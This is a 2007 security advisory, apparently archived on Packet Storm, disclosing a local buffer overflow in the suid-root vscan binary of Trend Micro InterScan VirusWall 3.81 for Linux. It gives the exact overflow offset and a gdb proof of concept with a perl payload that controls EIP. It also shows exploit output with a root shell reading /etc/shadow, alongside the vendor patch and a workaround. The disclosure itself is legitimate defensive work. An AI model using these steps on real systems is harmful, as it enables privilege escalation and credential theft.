exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

tmvwall381v3_adv.txt

tmvwall381v3_adv.txt
Posted Jan 27, 2007
Authored by Sebastian Wolfgarten

A local buffer overflow vulnerability in the VSAPI library in Trend Micro VirusWall version 3.81 on Linux allows arbitrary code execution and leads to privilege escalation.

tags | advisory, overflow, arbitrary, local, code execution
systems | linux
SHA-256 | 2c17540c6c33d93e818379d4381bc07d96560541c42d1a823b05b1f8a97aec8a

tmvwall381v3_adv.txt

Change Mirror Download
I - TITLE

Security advisory: Buffer overflow in VSAPI library of Trend Micro VirusWall
3.81 for Linux

II - SUMMARY

Description: Local buffer overflow vulnerability in VSAPI library allows
arbitrary code execution and leads to privilege escalation

Author: Sebastian Wolfgarten (sebastian at wolfgarten dot com),
http://www.devtarget.org

Date: January 25th, 2007

Severity: Medium

References: http://www.devtarget.org/trendmicro-advisory-01-2007.txt

III - OVERVIEW

The Trend Micro VirusWall is a software solution to block viruses, spyware,
spam and various other kinds of threats at the Internet gateway. More
information about the product can be found online at
http://www.trendmicro.com/en/products/gateway/isvw/evaluate/overview.htm.

IV - DETAILS

The product "InterScan VirusWall 3.81 for Linux" ships a legacy library
called "libvsapi.so" which is vulnerable to a memory corruption
vulnerability. One of the applications that apparently uses this library is
called "vscan" which is set suid root by default. It was discovered that this
supporting program is prone to a classic buffer overflow vulnerability when a
particularly long command-line argument is being passed and the application
utilizes the flawed library to attempt to copy that data into a finite
buffer. On a Debian 3.1 test system for instance an attacker is required to
supply 1116 + 4 bytes to completely overwrite the EIP register and thus
execute arbitrary code with root level privileges:

# /opt/trend/ISBASE/IScan.BASE/vscan -v
Virus Scanner v3.1, VSAPI v6.810-1005
Trend Micro Inc. 1996,1997
Pattern version 684
Pattern number 56446
No scan target specified!! do nothing.

# gdb /opt/trend/ISBASE/IScan.BASE/vscan
GNU gdb 6.3-debian
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are welcome to change it and/or distribute copies of it under certain
conditions. Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for
details. This GDB was configured as "i386-linux"...(no debugging symbols
found) Using host libthread_db library "/lib/tls/libthread_db.so.1".

(gdb) run `perl -e 'print "A"x1116 . "B"x4'`
Starting program: /opt/trend/ISBASE/IScan.BASE/vscan `perl -e 'print
"A"x1116 . "B"x4'`
(no debugging symbols found)
Virus Scanner v3.1, VSAPI v6.810-1005
Trend Micro Inc. 1996,1997
Pattern version 684
Pattern number 56446

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) info registers
eax 0xffffffff -1
ecx 0x24 36
edx 0x40277560 1076327776
ebx 0xbffffa03 -1073743357
esp 0xbffff818 0xbffff818
ebp 0x41414141 0x41414141
esi 0xbffff838 -1073743816
edi 0x804f008 134541320
eip 0x42424242 0x42424242
eflags 0x287 647
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51

V - ANALYSIS

The severity of this vulnerability is probably "medium" as by default the
vscan file is only executable by the root user as well as members of
the "iscan" group which is created during the installation of the software:

# ls -la /opt/trend/ISBASE/IScan.BASE/vscan
-r-sr-x--- 1 root iscan 24400 2003-12-20 03:53
/opt/trend/ISBASE/IScan.BASE/vscan

However administrators may potentially have changed the default permissions
and thus granted all local users the privilege to execute the file. If this
library is also used by other applications they may also be flawed
(unchecked).

VI - EXPLOIT CODE

An exploit for this vulnerability is attached to this email and can also be
found online at http://www.devtarget.org/tmvwall381v3_exp.c. It was
successfully tested on Debian Linux 3.1 with kernel 2.6.8 and leads to a
local privilege escalation:

sebastian@debian31:~$ ./tmvwall381v3_exp

Local root exploit for vscan/VSAPI (=Trend Micro VirusWall 3.81 on Linux)
Author: Sebastian Wolfgarten, <sebastian@wolfgarten.com>
Date: January 3rd, 2007

Okay, /opt/trend/ISBASE/IScan.BASE/vscan is executable and by the way,
your current user id is 5002.

Executing /opt/trend/ISBASE/IScan.BASE/vscan. Afterwards check your privilege
level with id or whoami!

Virus Scanner v3.1, VSAPI v8.310-1002
Trend Micro Inc. 1996,1997
Pattern number 4.155.00

sh-2.05b# id
uid=5002(sebastian) gid=100(users) euid=0(root) groups=100(users),5001(iscan)

sh-2.05b# cat /etc/shadow

root:***REMOVED***:13372:0:99999:7:::
daemon:*:13372:0:99999:7:::
bin:*:13372:0:99999:7:::
sys:*:13372:0:99999:7:::
sync:*:13372:0:99999:7:::
games:*:13372:0:99999:7:::

[...]

iscan:!:13500:0:99999:7:::
sebastian:***REMOVED***:13500:0:99999:7:::

VII - WORKAROUND/FIX

To address this problem, the vendor has released a patch called "InterScan
VirusWall 3.81 for Linux Security Patch - VSAPI module" which is available at
http://www.trendmicro.com/download/product.asp?productid=13&show=patch and
which will replace the flawed library libvsapi.so with a newer version. Hence
all users of the VirusWall product are asked to test and install this patch
as soon as possible. Trend Micro also created a knowledge base article that
covers the problem (see
http://esupport.trendmicro.com/support/viewxml.do?ContentID=EN-1034124&id=EN-1034124).

Furthermore as a temporary workaround one may also simply remove the suid bit
from the vscan file and thus render any attack virtually useless by executing

# chmod -s /opt/trend/ISBASE/IScan.BASE/vscan

The same holds true for any other (suid root) application that uses this
library.

VIII - DISCLOSURE TIMELINE

02. January 2007 - Notified security@trendmicro.com
05. January 2007 - Vulnerability confirmed
21. January 2007 - Release of patch
25. January 2007 - Public disclosure
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close